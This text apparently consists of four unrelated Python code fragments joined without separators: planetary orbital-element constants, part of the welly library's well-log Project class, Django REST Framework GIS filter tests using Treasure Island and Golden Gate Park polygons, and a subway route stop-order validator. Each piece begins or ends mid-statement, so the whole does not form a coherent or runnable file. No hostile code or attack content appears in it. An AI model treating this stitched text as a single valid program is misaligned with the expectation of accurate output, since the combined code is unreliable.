-0.000042037, -0.0000001236, 0.00000000004] I = [0., 0.0130546, -0.00000931, -0.000000034] O = [174.873174, -0.2410908, 0.00004067, -0.000001327] w = [102.937348, 0.3225557, 0.00015026, 0.000000478] lM = [100.466449, 35999.3728519, -0.00000568, 0.] Earth = self.SolarEph(a, e, I, O, w, lM) a = 1.523679342 e = [0.09340062, 0.000090483, -0.0000000806, -0.00000000035] I = [1.849726, -0.0081479, -0.00002255, -0.000000027] O = [49.558093, -0.2949846, -0.00063993, -0.000002143] w = [336.060234, 0.4438898, -0.00017321, 0.000000300] lM = [355.433275, 19140.2993313, 0.00000261, -0.000000003] Mars = self.SolarEph(a, e, I, O, w, lM) a = [5.202603191, 0.0000001913] e = [0.04849485, 0.000163244, -0.0000004719, -0.00000000197] I = [1.303270, -0.0019872, 0.00003318, 0.000000092] O = [100.464441, 0.1766828, 0.00090387, -0.000007032] w = [14.331309, 0.2155525, 0.00072252, -0.000004590] lM = [34.351484, 3034.9056746, -0.00008501, 0.000000004] Jupiter = self.SolarEph(a, e, I, O, w, lM) a = [9.554909596, -0.0000021389] e = [0.05550862, -0.000346818, -0.0000006456, 0.00000000338] I = [2.488878, 0.0025515, -0.00004903, 0.000000018] O = [113.665524, -0.2566649, -0.00018345, 0.000000357] w = [93.056787, 0.5665496, 0.00052809, 0.000004882] lM = [50.077471, 1222.1137943, 0.00021004, -0.000000019] Saturn = self.SolarEph(a, e, I, O, w, lM) a = [19.218446062, -0.0000000372, 0.00000000098] e = [0.04629590, -0.000027337, 0.0000000790, 0.00000000025] I = [0.773196, -0.0016869, 0.00000349, 0.000000016] O = [74.005947, 0.0741461, 0.00040540, 0.000000104] w = [173.005159, 0.0893206, -0.00009470, 0.000000413] lM = [314.055005, 428.4669983, -0.00000486, 0.000000006] Uranus = self.SolarEph(a, e, I, O, w, lM) a =
<reponame>agilescientific/welly<gh_stars>1-10 """ Defines a multi-well 'project'. :copyright: 2021 Agile Scientific :license: Apache 2.0 """ from __future__ import print_function import glob from collections import Counter from urllib.parse import non_hierarchical import warnings import numpy as np import pandas as pd from tqdm import tqdm from .well import Well, WellError from . import utils from .utils import deprecated from .plot import plot_kdes_project, plot_map_project class Project(object): """ Just a list of Well objects. One day it might want its own CRS, but then we'd have to cast the CRSs of the contained data. """ def __init__(self, list_of_Wells, source=''): self.alias = {} self.source = source self.__list = list_of_Wells self.__index = 0 def __repr__(self): s = [str(w.uwi) for w in self.__list] return "Project({} wells: {})".format(len(self), ', '.join(s)) def __str__(self): s = [str(w.uwi) for w in self.__list] return '\n'.join(s) def __getitem__(self, key): if isinstance(key, slice): i = key.indices(len(self.__list)) result = [self.__list[n] for n in range(*i)] return Project(result) elif isinstance(key, list): result = [] for j in key: result.append(self.__list[j]) return Project(result) else: return self.__list[key] def __setitem__(self, key, value): self.__list[key] = value def __delitem__(self, key): del(self.__list[key]) def __iter__(self): for w in self.__list: yield w def __len__(self): return len(list(self.__list)) def __contains__(self, item): if isinstance(item, Well): for d in self.__list: if item == d: return True return False def __add__(self, other): if isinstance(other, self.__class__): result = self.__list + other.__list return Project(result) elif isinstance(other, Well): result = self.__list + [other] return Project(result) else: raise WellError("You can only add legends or decors.") def _repr_html_(self): """ Jupyter Notebook magic repr function. """ # Make header. r = '</th><th>'.join(['Index', 'UWI', 'Data', 'Curves']) rows = '<tr><th>{}</th></tr>'.format(r) # Make rows. for i, w in enumerate(self.__list): rows += '<tr><td>{}</td>'.format(i) rows += '<td><strong>{}</strong></td>'.format(w.uwi) rows += '<td>{}&nbsp;curves</td>'.format(len(w.data)) rows += '<td>{}</td></tr>'.format(', '.join(w.data.keys())) html = '<table>{}</table>'.format(rows) return html def pop(self, index): item = self.__list.pop(index) self.__index = 0 return item @property def uwis(self): """Returns the UWIs of the wells in the project.""" return [w.uwi for w in self.__list] @property def basis_range(self): """ Returns a tuple of the min and max of all the curves in the wells in the project. """ idx = self.df().index.get_level_values('DEPT') return idx.min(), idx.max() @classmethod def from_las(cls, path=None, remap=None, funcs=None, data=True, req=None, alias=None, max=None, encoding=None, printfname=None, index=None, **kwargs, ): """ Constructor. Essentially just wraps ``Well.from_las()``, but is more convenient for most purposes. Args: path (str or list): The path of the LAS files, e.g. ``./*.las`` (the default). It will attempt to load everything it finds, so make sure it only leads to LAS files. remap (dict): Optional. A dict of 'old': 'new' LAS field names. funcs (dict): Optional. A dict of 'las field': function() for implementing a transform before loading. Can be a lambda. data (bool): Whether to load curves or not. req (list): A list of alias names, giving all required curves. If not all of the aliases are present, the well is not loaded. 
alias (dict): The alias dict, e.g. ``alias = {'gamma': ['GR', 'GR1'], 'density': ['RHOZ', 'RHOB'], 'pants': ['PANTS']}`` max (int): The max number of wells to load. encoding (str): File encoding; passed to lasio. printfname (bool): prints filename before trying to load it, for debugging index (str): Optional. Either "existing" (use the index as found in the LAS file) or "m", "ft" to use lasio's conversion of the relevant index unit. Returns: project. The project object. """ if max is None: max = 1e12 if (req is not None) and (alias is None): raise WellError("You need to provide an alias dict as well as requirement list.") if path is None: uris = glob.glob('./*.[LlAaSs]') elif isinstance(path, str): uris = glob.glob(path) if not uris: # The glob produced nothing. # URLs to 'folders' (eg a bucket) are not supported. # If it's a non-existent file, we'll get an error later. uris = [path] else: uris = path # It's a list-like of files and/or URLs. wells = [Well.from_las(f, remap=remap, funcs=funcs, data=data, req=req, alias=alias, encoding=encoding, printfname=printfname, index=index, **kwargs, ) for i, f in tqdm(enumerate(uris)) if i < max] return cls(list(filter(None, wells))) def add_canstrat_striplogs(self, path, uwi_transform=None, name='canstrat'): """ This may be too specific a method... just move it to the workflow. Requires striplog. """ from striplog import Striplog uwi_transform = uwi_transform or utils.null for w in self.__list: try: dat_file = utils.find_file(str(uwi_transform(w.uwi)), path) except: print("- Skipping {}: something went wrong".format(w.uwi)) continue if dat_file is None: print("- Omitting {}: no data".format(w.uwi)) continue # If we got here, we're using it. print("+ Adding {} from {}".format(w.uwi, dat_file)) w.data[name] = Striplog.from_canstrat(dat_file) return def __all_curve_names(self, uwis=None, unique=True, count=False, nodepth=True): """ Utility function to get all curve names from all wells, regardless of data type or repetition. """ uwis = uwis or self.uwis c = utils.flatten_list([list(w.data.keys()) for w in self if w.uwi in uwis]) if nodepth: c = filter(lambda x: x not in ['DEPT', 'DEPTH'], c) if unique: if count: return Counter(c).most_common() else: return [i[0] for i in Counter(c).most_common()] return list(c) def get_mnemonics(self, mnemonics, uwis=None, alias=None): """ Looks at all the wells in turn and returns the highest thing in the alias table. Args: mnemonics (list) alias (dict) Returns: list. A list of lists. """ # Let's not do the nested comprehension... uwis = uwis or self.uwis wells = [w for w in self.__list if w.uwi in uwis] all_wells = [] for w in wells: this_well = [w.get_mnemonic(m, alias=alias) for m in mnemonics] all_wells.append(this_well) return all_wells def count_mnemonic(self, mnemonic, uwis=uwis, alias=None): """ Counts the wells that have a given curve, given the mnemonic and an alias dict. """ all_mnemonics = self.get_mnemonics([mnemonic], uwis=uwis, alias=alias) return len(list(filter(None, utils.flatten_list(all_mnemonics)))) def curve_table_html(self, uwis=None, keys=None, alias=None, tests=None, exclude=None, limit=0): """ Another version of the curve table. Args: uwis (list): Only these UWIs. List of ``str``. keys (list): Only these names. List of ``str``. alias (dict): Alias table, maps names to mnemomnics in order of preference. tests (dict): Test table, maps names to lists of functions. exclude (list): Except these names. List of ``str``. Ignored if you pass ``keys``. 
limit (int): Curve must be present in at least this many wells. Returns: str. HTML representation of the table. """ uwis = uwis or self.uwis wells = [w for w in self.__list if w.uwi in uwis] # This is hacky. See remark in well.get_mnemonics_from_regex(). if exclude is not None: exclude = utils.flatten_list([w.get_mnemonics_from_regex(e) for e in exclude for w in wells]) if alias is not None: exclude = [alias.get(e, e) for e in exclude] else: exclude = [] counter = self.__all_curve_names(uwis=uwis, count=True) all_keys = [i[0] for i in counter if (i[0] not in exclude) and (i[1] >= limit)] keys = utils.flatten_list(keys) or all_keys tests = tests or {} alias = alias or self.alias # Make header. keys_ = [k + '*' if k in alias else k for k in keys] r = '</th><th>'.join(['Idx', 'UWI', 'Data', 'Passing'] + keys_) rows = '<tr><th>{}</th></tr>'.format(r) # Make summary row. well_counts = [self.count_mnemonic(m, uwis=uwis, alias=alias) for m in keys] w = len(wells) well_count_strs = ['{}/{}&nbsp;wells'.format(c, w) for c in well_counts] r = '</td><td>'.join(['', '', '', '%'] + well_count_strs) rows += '<tr><td>{}</td></tr>'.format(r) q_colours = { 0: '#FF3333', 1: '#33EE33', -1: '#AACCAA' # default: '#FFFFCC' # Done with get when we use this dict. } # Make rows. for i, w in enumerate(wells): this_well = [w.get_curve(m, alias=alias) for m in keys] q_well = w.qc_data(tests, keys=keys, alias=alias) curves = [] q_total, q_count = 0, 0 for c in this_well: q = -1 num_tests, num_passes = 0, 0 if c is None: curves.append(('#CCCCCC', '', '', '#CCCCCC', '', '')) else: if tests: q_this = q_well.get(c.mnemonic) if q_this: results = q_this.values() if results: num_tests = len(results) num_passes = sum(results) q = num_passes / num_tests q_colour = q_colours.get(q, '#FFCC33') c_mean = '{:.2f}'.format(float(np.nanmean(c.df.values))) if np.any(c.df.values[~np.isnan(c.df.values)]) else np.nan curves.append(('#CCEECC', c.mnemonic, f"{num_passes}/{num_tests}", q_colour, c_mean, c.units)) q_total += num_passes q_count += num_tests # Make general columns. count = w.count_curves(keys, alias) if count == 0: score = '–' else: score = '{:.0f}'.format(100 * (q_total / q_count)) if (q_total >= 0) and (q_count > 0) else '–' s =
import json import urllib from unittest import skipIf from django.conf import settings from django.contrib.gis.geos import GEOSGeometry, Polygon from django.test import TestCase try: from django.urls import reverse except ImportError: from django.core.urlresolvers import reverse from .models import Location from .views import ( GeojsonLocationContainedInBBoxList, GeojsonLocationOrderDistanceToPointList, GeojsonLocationWithinDistanceOfPointList, ) has_spatialite = ( settings.DATABASES['default']['ENGINE'] == 'django.contrib.gis.db.backends.spatialite' ) try: has_geometry_distance = True except ImportError: has_geometry_distance = False class TestRestFrameworkGisFilters(TestCase): """ unit tests for filters feature in restframework_gis """ def setUp(self): self.location_contained_in_bbox_list_url = reverse( 'api_geojson_location_list_contained_in_bbox_filter' ) self.location_overlaps_bbox_list_url = reverse( 'api_geojson_location_list_overlaps_bbox_filter' ) self.location_contained_in_tile_list_url = reverse( 'api_geojson_location_list_contained_in_tile_filter' ) self.location_overlaps_tile_list_url = reverse( 'api_geojson_location_list_overlaps_tile_filter' ) self.location_within_distance_of_point_list_url = reverse( 'api_geojson_location_list_within_distance_of_point_filter' ) self.location_within_degrees_of_point_list_url = reverse( 'api_geojson_location_list_within_degrees_of_point_filter' ) self.geojson_contained_in_geometry = reverse( 'api_geojson_contained_in_geometry' ) self.location_order_distance_to_point = reverse( 'api_geojson_location_order_distance_to_point_list_filter' ) treasure_island_geojson = """{ "type": "Polygon", "coordinates": [ [ [ -122.44640350341795, 37.86103094116189 ], [ -122.44262695312501, 37.85506751416839 ], [ -122.43481636047363, 37.853305500228025 ], [ -122.42975234985352, 37.854660899304704 ], [ -122.41953849792479, 37.852627791344894 ], [ -122.41807937622069, 37.853305500228025 ], [ -122.41868019104004, 37.86211514878027 ], [ -122.42391586303711, 37.870584971740065 ], [ -122.43035316467285, 37.8723465726078 ], [ -122.43515968322752, 37.86963639998042 ], [ -122.43953704833984, 37.86882332875222 ], [ -122.44640350341795, 37.86103094116189 ] ] ] }""" self.treasure_island_geom = GEOSGeometry(treasure_island_geojson) ggpark_geojson = """{ "type": "Polygon", "coordinates": [ [ [ -122.5111198425293, 37.77125750792944 ], [ -122.51026153564452, 37.76447260365713 ], [ -122.45309829711913, 37.76677954095475 ], [ -122.45481491088867, 37.77424266859531 ], [ -122.5111198425293, 37.77125750792944 ] ] ] }""" self.ggpark_geom = GEOSGeometry(ggpark_geojson) def test_inBBOXFilter_filtering(self): """ Checks that the inBBOXFilter returns only objects strictly contained in the bounding box given by the in_bbox URL parameter """ self.assertEqual(Location.objects.count(), 0) # Bounding box xmin = 0 ymin = 0 xmax = 10 ymax = 10 url_params = '?in_bbox=%d,%d,%d,%d&format=json' % (xmin, ymin, xmax, ymax) # Square with bottom left at (1,1), top right at (9,9) isContained = Location() isContained.name = 'isContained' isContained.geometry = Polygon(((1, 1), (9, 1), (9, 9), (1, 9), (1, 1))) isContained.save() isEqualToBounds = Location() isEqualToBounds.name = 'isEqualToBounds' isEqualToBounds.geometry = Polygon(((0, 0), (10, 0), (10, 10), (0, 10), (0, 0))) isEqualToBounds.save() # Rectangle with bottom left at (-1,1), top right at (5,5) overlaps = Location() overlaps.name = 'overlaps' overlaps.geometry = Polygon(((-1, 1), (5, 1), (5, 5), (-1, 5), (-1, 1))) overlaps.save() # Rectangle 
with bottom left at (-3,-3), top right at (-1,2) nonIntersecting = Location() nonIntersecting.name = 'nonIntersecting' nonIntersecting.geometry = Polygon( ((-3, -3), (-1, -3), (-1, 2), (-3, 2), (-3, -3)) ) nonIntersecting.save() # Make sure we only get back the ones strictly contained in the bounding box response = self.client.get( self.location_contained_in_bbox_list_url + url_params ) self.assertEqual(len(response.data['features']), 2) for result in response.data['features']: self.assertEqual( result['properties']['name'] in ('isContained', 'isEqualToBounds'), True ) # Make sure we get overlapping results for the view which allows bounding box overlaps. response = self.client.get(self.location_overlaps_bbox_list_url + url_params) self.assertEqual(len(response.data['features']), 3) for result in response.data['features']: self.assertEqual( result['properties']['name'] in ('isContained', 'isEqualToBounds', 'overlaps'), True, ) @skipIf(has_spatialite, 'Skipped test for spatialite backend: not accurate enough') def test_TileFilter_filtering(self): """ Checks that the TMSTileFilter returns only objects strictly contained in the bounding box given by the tile URL parameter """ self.assertEqual(Location.objects.count(), 0) # Bounding box z = 1 x = 1 y = 0 url_params = '?tile=%d/%d/%d&format=json' % (z, x, y) # Square with bottom left at (1,1), top right at (9,9) isContained = Location() isContained.name = 'isContained' isContained.geometry = Polygon(((1, 1), (9, 1), (9, 9), (1, 9), (1, 1))) isContained.save() isEqualToBounds = Location() isEqualToBounds.name = 'isEqualToBounds' isEqualToBounds.geometry = Polygon( ((0, 0), (0, 85.05113), (180, 85.05113), (180, 0), (0, 0)) ) isEqualToBounds.save() # Rectangle with bottom left at (-1,1), top right at (5,5) overlaps = Location() overlaps.name = 'overlaps' overlaps.geometry = Polygon(((-1, 1), (5, 1), (5, 5), (-1, 5), (-1, 1))) overlaps.save() # Rectangle with bottom left at (-3,-3), top right at (-1,2) nonIntersecting = Location() nonIntersecting.name = 'nonIntersecting' nonIntersecting.geometry = Polygon( ((-3, -3), (-1, -3), (-1, 2), (-3, 2), (-3, -3)) ) nonIntersecting.save() # Make sure we only get back the ones strictly contained in the bounding box response = self.client.get( self.location_contained_in_tile_list_url + url_params ) self.assertEqual(len(response.data['features']), 2) for result in response.data['features']: self.assertEqual( result['properties']['name'] in ('isContained', 'isEqualToBounds'), True ) # Make sure we get overlapping results for the view which allows bounding box overlaps. 
response = self.client.get(self.location_overlaps_tile_list_url + url_params) self.assertEqual(len(response.data['features']), 3) for result in response.data['features']: self.assertEqual( result['properties']['name'] in ('isContained', 'isEqualToBounds', 'overlaps'), True, ) @skipIf( has_spatialite, 'Skipped test for spatialite backend: missing feature "dwithin"' ) def test_DistanceToPointFilter_filtering(self): """ Checks that the DistanceFilter returns only objects within the given distance of the given geometry defined by the URL parameters """ self.assertEqual(Location.objects.count(), 0) # Filter parameters distance = 5000 # meters point_on_alcatraz = [-122.4222, 37.82667] url_params = '?dist=%0.4f&point=hello&format=json' % (distance,) response = self.client.get( '%s%s' % (self.location_within_distance_of_point_list_url, url_params) ) self.assertEqual(response.status_code, 400) url_params = '?dist=%0.4f&point=%0.4f,%0.4f&format=json' % ( distance, point_on_alcatraz[0], point_on_alcatraz[1], ) treasure_island = Location() treasure_island.name = "Treasure Island" treasure_island.geometry = self.treasure_island_geom treasure_island.full_clean() treasure_island.save() ggpark = Location() ggpark.name = "Golden Gate Park" ggpark.geometry = self.ggpark_geom ggpark.save() # Make sure we only get back the ones within the distance response = self.client.get( '%s%s' % (self.location_within_distance_of_point_list_url, url_params) ) self.assertEqual(len(response.data['features']), 1) for result in response.data['features']: self.assertEqual(result['properties']['name'], treasure_island.name) # Make sure we get back all the ones within the distance distance = 7000 url_params = '?dist=%0.4f&point=%0.4f,%0.4f&format=json' % ( distance, point_on_alcatraz[0], point_on_alcatraz[1], ) response = self.client.get( '%s%s' % (self.location_within_distance_of_point_list_url, url_params) ) self.assertEqual(len(response.data['features']), 2) for result in response.data['features']: self.assertIn( result['properties']['name'], (ggpark.name, treasure_island.name) ) # Make sure we only get back the ones within the distance degrees = 0.05 url_params = '?dist=%0.4f&point=%0.4f,%0.4f&format=json' % ( degrees, point_on_alcatraz[0], point_on_alcatraz[1], ) response = self.client.get( self.location_within_degrees_of_point_list_url + url_params ) self.assertEqual(len(response.data['features']), 1) for result in response.data['features']: self.assertEqual(result['properties']['name'], treasure_island.name) @skipIf( has_spatialite, 'Skipped test for spatialite backend: missing feature "GeometryDistance"', ) @skipIf( not has_geometry_distance, 'Skipped test for Django < 3.0: missing feature "GeometryDistance"', ) def test_DistanceToPointOrderingFilter_filtering(self): """ Checks that the DistanceOrderingFilter returns the objects in the correct order given the geometry defined by the URL parameters """ self.assertEqual(Location.objects.count(), 0) url_params = '?point=hello&format=json' response = self.client.get( '%s%s' % (self.location_order_distance_to_point, url_params) ) self.assertEqual(response.status_code, 400) Location.objects.create( name='Houston', geometry='SRID=4326;POINT (-95.363151 29.763374)' ) Location.objects.create( name='Dallas', geometry='SRID=4326;POINT (-96.801611 32.782057)' ) Location.objects.create( name='Oklahoma City', geometry='SRID=4326;POINT (-97.521157 34.464642)' ) Location.objects.create( name='Wellington', geometry='SRID=4326;POINT (174.783117 -41.315268)' ) Location.objects.create( 
name='Pueblo', geometry='SRID=4326;POINT (-104.609252 38.255001)' ) Location.objects.create( name='Lawrence', geometry='SRID=4326;POINT (-95.235060 38.971823)' ) Location.objects.create( name='Chicago', geometry='SRID=4326;POINT (-87.650175 41.850385)' ) Location.objects.create( name='Victoria', geometry='SRID=4326;POINT (-123.305196 48.462611)' ) point = [-90, 40] url_params = '?point=%i,%i&format=json' % (point[0], point[1]) response = self.client.get( '%s%s' % (self.location_order_distance_to_point, url_params) ) self.assertEqual(len(response.data['features']), 8) self.assertEqual( [city['properties']['name'] for city in response.data['features']], [ 'Chicago', 'Lawrence', 'Oklahoma City', 'Dallas', 'Houston', 'Pueblo', 'Victoria', 'Wellington', ], ) url_params = '?point=%i,%i&order=desc&format=json' % (point[0], point[1]) response = self.client.get( '%s%s' % (self.location_order_distance_to_point, url_params) ) self.assertEqual(len(response.data['features']), 8) self.assertEqual( [city['properties']['name'] for city in response.data['features']], [ 'Wellington', 'Victoria', 'Pueblo', 'Houston', 'Dallas', 'Oklahoma City', 'Lawrence', 'Chicago', ], ) @skipIf( has_spatialite, 'Skipped test for spatialite backend: missing feature "contains_properly"', ) def test_GeometryField_filtering(self): """Checks that the GeometryField allows sane filtering.""" self.assertEqual(Location.objects.count(), 0) treasure_island = Location() treasure_island.name = "Treasure Island" treasure_island.geometry = self.treasure_island_geom treasure_island.full_clean() treasure_island.save() ggpark = Location() ggpark.name = "Golden Gate Park" ggpark.geometry = self.ggpark_geom ggpark.save() point_inside_ggpark_geojson = """ { "type": "Point", "coordinates": [ -122.49034881591797, 37.76949349270407 ] } """ try: quoted_param = urllib.quote(point_inside_ggpark_geojson) except AttributeError: quoted_param = urllib.parse.quote(point_inside_ggpark_geojson) url_params = "?contains_properly=%s" % (quoted_param,) response = self.client.get( '{0}{1}'.format(self.geojson_contained_in_geometry, url_params) ) self.assertEqual(len(response.data), 1) geometry_response = GEOSGeometry(json.dumps(response.data[0]['geometry'])) self.assertTrue(geometry_response.equals_exact(self.ggpark_geom)) self.assertEqual(response.data[0]['name'], ggpark.name) # try without any param, should return both response = self.client.get(self.geojson_contained_in_geometry) self.assertEqual(len(response.data), 2) def test_inBBOXFilter_filtering_none(self): url_params = '?in_bbox=&format=json' response = self.client.get( self.location_contained_in_bbox_list_url + url_params ) self.assertDictEqual( response.data, {'type': 'FeatureCollection', 'features': []} ) def test_inBBOXFilter_ValueError(self): url_params = '?in_bbox=0&format=json' response = self.client.get( self.location_contained_in_bbox_list_url + url_params ) self.assertEqual( response.data['detail'], 'Invalid bbox string supplied for parameter in_bbox', ) def test_inBBOXFilter_filter_field_none(self): original_value = GeojsonLocationContainedInBBoxList.bbox_filter_field GeojsonLocationContainedInBBoxList.bbox_filter_field = None url_params = '?in_bbox=0,0,0,0&format=json' response = self.client.get( self.location_contained_in_bbox_list_url + url_params ) self.assertDictEqual( response.data, {'type': 'FeatureCollection', 'features': []} ) GeojsonLocationContainedInBBoxList.bbox_filter_field = original_value def test_TileFilter_filtering_none(self): url_params = '?tile=&format=json' response = 
self.client.get( self.location_contained_in_tile_list_url + url_params ) self.assertEqual(response.data, {'type': 'FeatureCollection', 'features': []}) def test_TileFilter_ValueError(self): url_params = '?tile=1/0&format=json' response = self.client.get( self.location_contained_in_tile_list_url + url_params ) self.assertEqual( response.data['detail'], 'Invalid tile string supplied for parameter tile' ) def test_DistanceToPointFilter_filtering_none(self): url_params = '?dist=5000&point=&format=json' response = self.client.get( '%s%s' % (self.location_within_distance_of_point_list_url, url_params) ) self.assertDictEqual( response.data, {'type': 'FeatureCollection', 'features': []} ) def test_DistanceToPointFilter_filter_field_none(self): original_value = GeojsonLocationWithinDistanceOfPointList.distance_filter_field
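The tests above drive every filter purely through URL query parameters. As a minimal sketch (the helper names are illustrative and not part of the test suite; only the parameter names in_bbox, tile, dist and point are taken from the tests themselves), the snippet below builds those query strings for use with the Django test client or any other HTTP client:

from urllib.parse import urlencode

def in_bbox_query(xmin, ymin, xmax, ymax):
    # ?in_bbox=xmin,ymin,xmax,ymax&format=json -- strict containment filter
    return '?' + urlencode({'in_bbox': f'{xmin},{ymin},{xmax},{ymax}', 'format': 'json'})

def tile_query(z, x, y):
    # ?tile=z/x/y&format=json -- TMS tile filter
    return '?' + urlencode({'tile': f'{z}/{x}/{y}', 'format': 'json'})

def distance_to_point_query(dist, lon, lat):
    # ?dist=<distance>&point=<lon>,<lat>&format=json -- distance-to-point filter
    return '?' + urlencode({'dist': dist, 'point': f'{lon},{lat}', 'format': 'json'})

# e.g. inside a test:
#   response = self.client.get(self.location_contained_in_bbox_list_url + in_bbox_query(0, 0, 10, 10))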
not seem a route: {}'.format(relation) ) master_tags = {} if not master else master['tags'] self.city = city self.element = relation self.id = el_id(relation) if 'ref' not in relation['tags'] and 'ref' not in master_tags: city.notice('Missing ref on a route', relation) self.ref = relation['tags'].get( 'ref', master_tags.get('ref', relation['tags'].get('name', None)) ) self.name = relation['tags'].get('name', None) self.mode = relation['tags']['route'] if ( 'colour' not in relation['tags'] and 'colour' not in master_tags and self.mode != 'tram' ): city.notice('Missing colour on a route', relation) try: self.colour = normalize_colour( relation['tags'].get('colour', master_tags.get('colour', None)) ) except ValueError as e: self.colour = None city.warn(str(e), relation) try: self.infill = normalize_colour( relation['tags'].get( 'colour:infill', master_tags.get('colour:infill', None) ) ) except ValueError as e: self.infill = None city.warn(str(e), relation) self.network = Route.get_network(relation) self.interval = Route.get_interval( relation['tags'] ) or Route.get_interval(master_tags) if relation['tags'].get('public_transport:version') == '1': city.warn( 'Public transport version is 1, which means the route ' 'is an unsorted pile of objects', relation, ) self.is_circular = False # self.tracks would be a list of (lon, lat) for the longest stretch. Can be empty tracks, line_nodes = self.build_longest_line(relation) self.tracks = [el_center(city.elements.get(k)) for k in tracks] if ( None in self.tracks ): # usually, extending BBOX for the city is needed self.tracks = [] for n in filter(lambda x: x not in city.elements, tracks): city.warn( 'The dataset is missing the railway tracks node {}'.format( n ), relation, ) break self.stops = [] # List of RouteStop stations = set() # temporary for recording stations seen_stops = False seen_platforms = False repeat_pos = None for m in relation['members']: if 'inactive' in m['role']: continue k = el_id(m) if k in city.stations: st_list = city.stations[k] st = st_list[0] if len(st_list) > 1: city.error( 'Ambiguous station {} in route. Please use stop_position or split ' 'interchange stations'.format(st.name), relation, ) el = city.elements[k] actual_role = RouteStop.get_actual_role( el, m['role'], city.modes ) if actual_role: if m['role'] and actual_role not in m['role']: city.warn( "Wrong role '{}' for {} {}".format( m['role'], actual_role, k ), relation, ) if repeat_pos is None: if not self.stops or st not in stations: stop = RouteStop(st) self.stops.append(stop) stations.add(st) elif self.stops[-1].stoparea.id == st.id: stop = self.stops[-1] else: # We've got a repeat if ( (seen_stops and seen_platforms) or ( actual_role == 'stop' and not seen_platforms ) or ( actual_role == 'platform' and not seen_stops ) ): # Circular route! 
stop = RouteStop(st) self.stops.append(stop) stations.add(st) else: repeat_pos = 0 if repeat_pos is not None: if repeat_pos >= len(self.stops): continue # Check that the type matches if (actual_role == 'stop' and seen_stops) or ( actual_role == 'platform' and seen_platforms ): city.error( 'Found an out-of-place {}: "{}" ({})'.format( actual_role, el['tags'].get('name', ''), k ), relation, ) continue # Find the matching stop starting with index repeat_pos while ( repeat_pos < len(self.stops) and self.stops[repeat_pos].stoparea.id != st.id ): repeat_pos += 1 if repeat_pos >= len(self.stops): city.error( 'Incorrect order of {}s at {}'.format( actual_role, k ), relation, ) continue stop = self.stops[repeat_pos] stop.add(m, relation, city) if repeat_pos is None: seen_stops |= stop.seen_stop or stop.seen_station seen_platforms |= stop.seen_platform if StopArea.is_stop(el): if k not in line_nodes: city.warn( 'Stop position "{}" ({}) is not on tracks'.format( el['tags'].get('name', ''), k ), relation, ) continue if k not in city.elements: if 'stop' in m['role'] or 'platform' in m['role']: raise CriticalValidationError( '{} {} {} for route relation {} is not in the dataset'.format( m['role'], m['type'], m['ref'], relation['id'] ) ) continue el = city.elements[k] if 'tags' not in el: city.error('Untagged object {} in a route'.format(k), relation) continue is_under_construction = False for ck in CONSTRUCTION_KEYS: if ck in el['tags']: city.warn( 'Under construction {} {} in route. Consider ' 'setting \'inactive\' role or removing construction attributes'.format( m['role'] or 'feature', k ), relation, ) is_under_construction = True break if is_under_construction: continue if Station.is_station(el, city.modes): # A station may be not included into this route due to previous # 'stop area has multiple stations' error. No other error message is needed. pass elif el['tags'].get('railway') in ('station', 'halt'): city.error( 'Missing station={} on a {}'.format(self.mode, m['role']), el, ) else: actual_role = RouteStop.get_actual_role( el, m['role'], city.modes ) if actual_role: city.error( '{} {} {} is not connected to a station in route'.format( actual_role, m['type'], m['ref'] ), relation, ) elif not StopArea.is_track(el): city.warn( 'Unknown member type for {} {} in route'.format( m['type'], m['ref'] ), relation, ) if len(self.stops) > 1: self.is_circular = ( self.stops[0].stoparea == self.stops[-1].stoparea ) stops_on_longest_line = self.project_stops_on_line() self.check_and_recover_stops_order(stops_on_longest_line) self.calculate_distances() def check_stops_order_by_angle(self): disorder_warnings = [] disorder_errors = [] for si in range(len(self.stops) - 2): angle = angle_between( self.stops[si].stop, self.stops[si + 1].stop, self.stops[si + 2].stop, ) if angle < ALLOWED_ANGLE_BETWEEN_STOPS: msg = 'Angle between stops around "{}" is too narrow, {} degrees'.format( self.stops[si + 1].stoparea.name, angle ) if angle < DISALLOWED_ANGLE_BETWEEN_STOPS: disorder_errors.append(msg) else: disorder_warnings.append(msg) return disorder_warnings, disorder_errors def check_stops_order_on_tracks_direct(self, stop_sequence): """Checks stops order on tracks, following stop_sequence in direct order only. :param stop_sequence: list of RouteStop that belong to the longest contiguous sequence of tracks in a route. :return: error message on the first order violation or None. 
""" def make_assertion_error_msg(route_stop, error_type): return ( "stop_area {} '{}' has {} 'positions_on_rails' " "attribute in route {}".format( route_stop.stoparea.id, route_stop.stoparea.name, "no" if error_type == 1 else "empty", self.id, ) ) allowed_order_violations = 1 if self.is_circular else 0 max_position_on_rails = -1 for route_stop in stop_sequence: assert hasattr( route_stop, 'positions_on_rails' ), make_assertion_error_msg(route_stop, error_type=1) positions_on_rails = route_stop.positions_on_rails assert positions_on_rails, make_assertion_error_msg( route_stop, error_type=2 ) suitable_occurrence = 0 while ( suitable_occurrence < len(positions_on_rails) and positions_on_rails[suitable_occurrence] < max_position_on_rails ): suitable_occurrence += 1 if suitable_occurrence == len(positions_on_rails): if allowed_order_violations > 0: suitable_occurrence -= 1 allowed_order_violations -= 1 else: return 'Stops on tracks are unordered near "{}" {}'.format( route_stop.stoparea.name, route_stop.stop ) max_position_on_rails = positions_on_rails[suitable_occurrence] def check_stops_order_on_tracks(self, stop_sequence): """Checks stops order on tracks, trying direct and reversed order of stops in the stop_sequence. :param stop_sequence: list of RouteStop that belong to the longest contiguous sequence of tracks in a route. :return: error message on the first order violation or None. """ error_message = self.check_stops_order_on_tracks_direct(stop_sequence) if error_message: error_message_reversed = self.check_stops_order_on_tracks_direct( reversed(stop_sequence) ) if error_message_reversed is None: error_message = None self.city.warn( 'Tracks seem to go in the opposite direction to stops', self.element, ) return error_message def check_stops_order(self, stops_on_longest_line): ( angle_disorder_warnings, angle_disorder_errors, ) = self.check_stops_order_by_angle() disorder_on_tracks_error = self.check_stops_order_on_tracks( stops_on_longest_line ) disorder_warnings = angle_disorder_warnings disorder_errors = angle_disorder_errors if disorder_on_tracks_error: disorder_errors.append(disorder_on_tracks_error) return disorder_warnings, disorder_errors def check_and_recover_stops_order(self, stops_on_longest_line): disorder_warnings, disorder_errors = self.check_stops_order( stops_on_longest_line ) if disorder_warnings or disorder_errors: resort_success = False if self.city.recovery_data: resort_success = self.try_resort_stops() if resort_success: for msg in disorder_warnings: self.city.notice(msg, self.element) for msg in disorder_errors: self.city.warn( "Fixed with recovery data: " + msg, self.element ) if not resort_success: for msg in disorder_warnings: self.city.notice(msg, self.element) for msg in disorder_errors: self.city.error(msg, self.element) def try_resort_stops(self): """Precondition: self.city.recovery_data is not None. Return success of station order recovering.""" self_stops = 